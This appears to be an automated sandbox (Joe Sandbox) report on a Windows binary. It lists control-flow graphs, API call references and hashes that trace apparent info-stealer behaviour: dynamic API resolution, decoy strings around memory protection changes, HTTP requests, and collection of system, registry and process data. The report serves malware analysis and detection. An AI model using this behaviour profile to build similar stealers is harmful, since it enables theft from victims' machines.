15282->15283 15284 af2484 15283->15284 15285 afa8a0 lstrcpy 15284->15285 15286 af248d 15285->15286 15287 afa9b0 4 API calls 15286->15287 15288 af24ae 15287->15288 15289 afa8a0 lstrcpy 15288->15289 15290 af24b7 15289->15290 15830 af8320 15290->15830 15292 af24d3 15293 afa920 3 API calls 15292->15293 15294 af24e6 15293->15294 15295 afa8a0 lstrcpy 15294->15295 15296 af24ef 15295->15296 15297 afa9b0 4 API calls 15296->15297 15298 af2519 15297->15298 15299 afa8a0 lstrcpy 15298->15299 15300 af2522 15299->15300 15301 afa9b0 4 API calls 
15300->15301 15302 af2543 15301->15302 15303 afa8a0 lstrcpy 15302->15303 15304 af254c 15303->15304 15305 af8320 17 API calls 15304->15305 15306 af2568 15305->15306 15307 afa920 3 API calls 15306->15307 15308 af257b 15307->15308 15309 afa8a0 lstrcpy 15308->15309 15310 af2584 15309->15310 15311 afa9b0 4 API calls 15310->15311 15312 af25ae 15311->15312 15313 afa8a0 lstrcpy 15312->15313 15314 af25b7 15313->15314 15315 afa9b0 4 API calls 15314->15315 15316 af25d6 15315->15316 15317 afa8a0 lstrcpy 15316->15317 15318 af25df 15317->15318 15319 afa9b0 4 API calls 15318->15319 15320 af2600 15319->15320 15321 afa8a0 lstrcpy 15320->15321 15322 af2609 15321->15322 15866 af8680 15322->15866 15324 af2620 15325 afa920 3 API calls 15324->15325 15326 af2633 15325->15326 15327 afa8a0 lstrcpy 15326->15327 15328 af263c 15327->15328 15329 af265a lstrlen 15328->15329 15330 af266a 15329->15330 15331 afa740 lstrcpy 15330->15331 15332 af267c 15331->15332 15333 ae1590 lstrcpy 15332->15333 15334 af268d 15333->15334 15876 af5190 15334->15876 15336 af2699 15336->13767 16064 afaad0 15337->16064 15339 ae5009 InternetOpenUrlA 15343 ae5021 15339->15343 15340 ae502a InternetReadFile 15340->15343 15341 ae50a0 InternetCloseHandle InternetCloseHandle 15342 ae50ec 15341->15342 15342->13771 15343->15340 15343->15341 16065 ae98d0 15344->16065 15346 af0759 15347 af077d 15346->15347 15348 af0a38 15346->15348 15351 af0799 StrCmpCA 15347->15351 15349 ae1590 lstrcpy 15348->15349 15350 af0a49 15349->15350 16241 af0250 15350->16241 15352 af0843 15351->15352 15353 af07a8 15351->15353 15358 af0865 StrCmpCA 15352->15358 15355 afa7a0 lstrcpy 15353->15355 15357 af07c3 15355->15357 15359 ae1590 lstrcpy 15357->15359 15360 af0874 15358->15360 15396 af096b 15358->15396 15361 af080c 15359->15361 15362 afa740 lstrcpy 15360->15362 15364 afa7a0 lstrcpy 15361->15364 15363 af0881 15362->15363 15366 afa9b0 4 API calls 15363->15366 15367 af0823 15364->15367 15365 af099c StrCmpCA 15368 af09ab 15365->15368 15369 af0a2d 
15365->15369 15371 af08ac 15366->15371 15372 afa7a0 lstrcpy 15367->15372 15370 ae1590 lstrcpy 15368->15370 15369->13775 15373 af09f4 15370->15373 15374 afa920 3 API calls 15371->15374 15375 af083e 15372->15375 15376 afa7a0 lstrcpy 15373->15376 15377 af08b3 15374->15377 16068 aefb00 15375->16068 15379 af0a0d 15376->15379 15380 afa9b0 4 API calls 15377->15380 15381 afa7a0 lstrcpy 15379->15381 15382 af08ba 15380->15382 15383 af0a28 15381->15383 15396->15365 15716 afa7a0 lstrcpy 15715->15716 15717 ae1683 15716->15717 15718 afa7a0 lstrcpy 15717->15718 15719 ae1695 15718->15719 15720 afa7a0 lstrcpy 15719->15720 15721 ae16a7 15720->15721 15722 afa7a0 lstrcpy 15721->15722 15723 ae15a3 15722->15723 15723->14598 15725 ae47c6 15724->15725 15726 ae4838 lstrlen 15725->15726 15750 afaad0 15726->15750 15728 ae4848 InternetCrackUrlA 15729 ae4867 15728->15729 15729->14675 15731 ae4eee 15730->15731 15732 ae9af9 LocalAlloc 15730->15732 15731->14697 15731->14702 15732->15731 15733 ae9b14 CryptStringToBinaryA 15732->15733 15733->15731 15734 ae9b39 LocalFree 15733->15734 15734->15731 15736 afa740 lstrcpy 15735->15736 15737 af8b74 15736->15737 15738 afa740 lstrcpy 15737->15738 15739 af8b82 GetSystemTime 15738->15739 15740 af8b99 15739->15740 15741 afa7a0 lstrcpy 15740->15741 15742 af8bfc 15741->15742 15742->14691 15744 afa931 15743->15744 15745 afa988 15744->15745 15747 afa968 lstrcpy lstrcat 15744->15747 15746 afa7a0 lstrcpy 15745->15746 15748 afa994 15746->15748 15747->15745 15748->14694 15749->14809 15750->15728 15751->14819 15752->14960 15753->14962 15754->14970 15883 af77a0 15755->15883 15758 af1c1e 15758->15052 15759 af76c6 RegOpenKeyExA 15760 af76e7 RegQueryValueExA 15759->15760 15761 af7704 RegCloseKey 15759->15761 15760->15761 15761->15758 15763 af1c99 15762->15763 15763->15066 15765 af1e09 15764->15765 15765->15108 15767 af7a9a wsprintfA 15766->15767 15768 af1e84 15766->15768 15767->15768 15768->15122 15770 af7b4d 15769->15770 15771 af1efe 15769->15771 15890 af8d20 LocalAlloc 
CharToOemW 15770->15890 15771->15136 15774 afa740 lstrcpy 15773->15774 15775 af7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15774->15775 15776 af7c25 15775->15776 15777 af7d18 15776->15777 15778 af7c46 GetLocaleInfoA 15776->15778 15781 afa9b0 lstrcpy lstrlen lstrcpy lstrcat 15776->15781 15784 afa8a0 lstrcpy 15776->15784 15779 af7d1e LocalFree 15777->15779 15780 af7d28 15777->15780 15778->15776 15779->15780 15782 afa7a0 lstrcpy 15780->15782 15781->15776 15783 af7d37 15782->15783 15783->15149 15784->15776 15786 af2008 15785->15786 15786->15164 15788 af94b5 15787->15788 15789 af9493 GetModuleFileNameExA CloseHandle 15787->15789 15790 afa740 lstrcpy 15788->15790 15789->15788 15791 af2091 15790->15791 15791->15179 15793 af7e68 RegQueryValueExA 15792->15793 15794 af2119 15792->15794 15795 af7e8e RegCloseKey 15793->15795 15794->15193 15795->15794 15797 af7fb9 GetLogicalProcessorInformationEx 15796->15797 15798 af7fd8 GetLastError 15797->15798 15803 af8029 15797->15803 15806 af8022 15798->15806 15808 af7fe3 15798->15808 15799 af2194 15799->15207 15802 af89f0 2 API calls 15802->15799 15804 af89f0 2 API calls 15803->15804 15805 af807b 15804->15805 15805->15806 15807 af8084 wsprintfA 15805->15807 15806->15799 15806->15802 15807->15799 15808->15797 15808->15799 15891 af89f0 15808->15891 15894 af8a10 GetProcessHeap RtlAllocateHeap 15808->15894 15810 af220f 15809->15810 15810->15221 15812 af89b0 15811->15812 15813 af814d GlobalMemoryStatusEx 15812->15813 15815 af8163 __aulldiv 15813->15815 15814 af819b wsprintfA 15816 af2289 15814->15816 15815->15814 15816->15235 15818 af87fb GetProcessHeap RtlAllocateHeap wsprintfA 15817->15818 15820 afa740 lstrcpy 15818->15820 15821 af230b 15820->15821 15821->15249 15823 afa740 lstrcpy 15822->15823 15827 af8229 15823->15827 15824 af8263 15826 afa7a0 lstrcpy 15824->15826 15825 afa9b0 lstrcpy lstrlen lstrcpy lstrcat 15825->15827 15828 af82dc 15826->15828 15827->15824 15827->15825 15829 afa8a0 lstrcpy 15827->15829 15828->15266 
                          • Control-flow graph edge listing for the preceding function (continued; the rendered graph's node and edge data are not reproduced). APIs referenced by the listed blocks: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey, wsprintfA, lstrcpy, lstrlen, lstrcat, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, GetProcessHeap, RtlAllocateHeap, HeapFree, InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetCloseHandle, CryptBinaryToStringA, VirtualAlloc, VirtualFree, LoadLibraryA, GetProcAddress, FreeLibrary.

                          Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)

                          • Basic blocks: af9860-af9874 (call af9750); af987a-af9a8e (call af9780, GetProcAddress * 21); af9a93-af9af2 (LoadLibraryA * 5); af9af4-af9b08 (GetProcAddress); af9b0d-af9b14; af9b16-af9b41 (GetProcAddress * 2); af9b46-af9b4d; af9b4f-af9b63 (GetProcAddress); af9b68-af9b6f; af9b71-af9b84 (GetProcAddress); af9b89-af9b90; af9b92-af9bbc (GetProcAddress * 2); af9bc1-af9bc2
                          APIs
                          • GetProcAddress.KERNEL32(75550000,01790650), ref: 00AF98A1
                          • GetProcAddress.KERNEL32(75550000,01790668), ref: 00AF98BA
                          • GetProcAddress.KERNEL32(75550000,01790680), ref: 00AF98D2
                          • GetProcAddress.KERNEL32(75550000,01790758), ref: 00AF98EA
                          • GetProcAddress.KERNEL32(75550000,01790530), ref: 00AF9903
                          • GetProcAddress.KERNEL32(75550000,01798B48), ref: 00AF991B
                          • GetProcAddress.KERNEL32(75550000,01785548), ref: 00AF9933
                          • GetProcAddress.KERNEL32(75550000,017854A8), ref: 00AF994C
                          • GetProcAddress.KERNEL32(75550000,017906E0), ref: 00AF9964
                          • GetProcAddress.KERNEL32(75550000,01790710), ref: 00AF997C
                          • GetProcAddress.KERNEL32(75550000,01790548), ref: 00AF9995
                          • GetProcAddress.KERNEL32(75550000,01790740), ref: 00AF99AD
                          • GetProcAddress.KERNEL32(75550000,01785288), ref: 00AF99C5
                          • GetProcAddress.KERNEL32(75550000,01790770), ref: 00AF99DE
                          • GetProcAddress.KERNEL32(75550000,01790788), ref: 00AF99F6
                          • GetProcAddress.KERNEL32(75550000,01785328), ref: 00AF9A0E
                          • GetProcAddress.KERNEL32(75550000,01790560), ref: 00AF9A27
                          • GetProcAddress.KERNEL32(75550000,01790890), ref: 00AF9A3F
                          • GetProcAddress.KERNEL32(75550000,01785488), ref: 00AF9A57
                          • GetProcAddress.KERNEL32(75550000,01790860), ref: 00AF9A70
                          • GetProcAddress.KERNEL32(75550000,01785348), ref: 00AF9A88
                          • LoadLibraryA.KERNEL32(01790848,?,00AF6A00), ref: 00AF9A9A
                          • LoadLibraryA.KERNEL32(01790878,?,00AF6A00), ref: 00AF9AAB
                          • LoadLibraryA.KERNEL32(017908A8,?,00AF6A00), ref: 00AF9ABD
                          • LoadLibraryA.KERNEL32(017908C0,?,00AF6A00), ref: 00AF9ACF
                          • LoadLibraryA.KERNEL32(01790818,?,00AF6A00), ref: 00AF9AE0
                          • GetProcAddress.KERNEL32(75670000,01790800), ref: 00AF9B02
                          • GetProcAddress.KERNEL32(75750000,01790830), ref: 00AF9B23
                          • GetProcAddress.KERNEL32(75750000,01798C78), ref: 00AF9B3B
                          • GetProcAddress.KERNEL32(76BE0000,01798DF8), ref: 00AF9B5D
                          • GetProcAddress.KERNEL32(759D0000,017852E8), ref: 00AF9B7E
                          • GetProcAddress.KERNEL32(773F0000,01798A08), ref: 00AF9B9F
                          • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00AF9BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00AF9BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 08aa8bc7aef023abc1c240a1937d602bd9c25fbbd23a9d3ee6a107b800985455
                          • Instruction ID: ff3245d45ee0e6bbe0e2625417f91a98e2bfdb67dc9536201229d35d0ce304db
                          • Opcode Fuzzy Hash: 08aa8bc7aef023abc1c240a1937d602bd9c25fbbd23a9d3ee6a107b800985455
                          • Instruction Fuzzy Hash: D2A128B55003409FD364EFACEE88A6677F9F76C601704492AE619C3364D739A843CB7A

                          Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)

                          • Basic blocks: ae45c0-ae4695 (RtlAllocateHeap); ae46a0-ae46a6; ae46ac-ae474a; ae474f-ae47a9 (VirtualProtect)
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AE479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE477B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 18f2ffe0d6ab4527d075704407c11f9f5ef7200de0e65a4756a5818ae92195b3
                          • Instruction ID: d5f610213d32cc3f95b064a3134486134b1dd292206f66200881c69859c099cd
                          • Opcode Fuzzy Hash: 18f2ffe0d6ab4527d075704407c11f9f5ef7200de0e65a4756a5818ae92195b3
                          • Instruction Fuzzy Hash: 034137717D26146BC734BBF4884EE9F7BAADF46712F6190C8AA005A6D0CBB06501CDAD

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • InternetOpenA.WININET(00B00DFE,00000001,00000000,00000000,00000000), ref: 00AE62E1
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AE63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AE63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AE646D
                          • InternetCloseHandle.WININET(00000000), ref: 00AE64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00AE64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00AE6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: d55dc1361e43de8a3ff37facdeb36dd10066c83433743cbdee387d354636c322
                          • Instruction ID: c6895206903f45f6beeff695594a562f9ece5e60fa2497b7e36a37437f718725
                          • Opcode Fuzzy Hash: d55dc1361e43de8a3ff37facdeb36dd10066c83433743cbdee387d354636c322
                          • Instruction Fuzzy Hash: C9715E71A00258ABDB24EFD4CD49BEE7774FB54700F108598F609AB2D0DBB46A85CFA1

                          Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)

                          • Basic blocks: af78e0-af7937 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA); af7939-af793e; af7942-af7945; af7962-af7972
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00AF792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
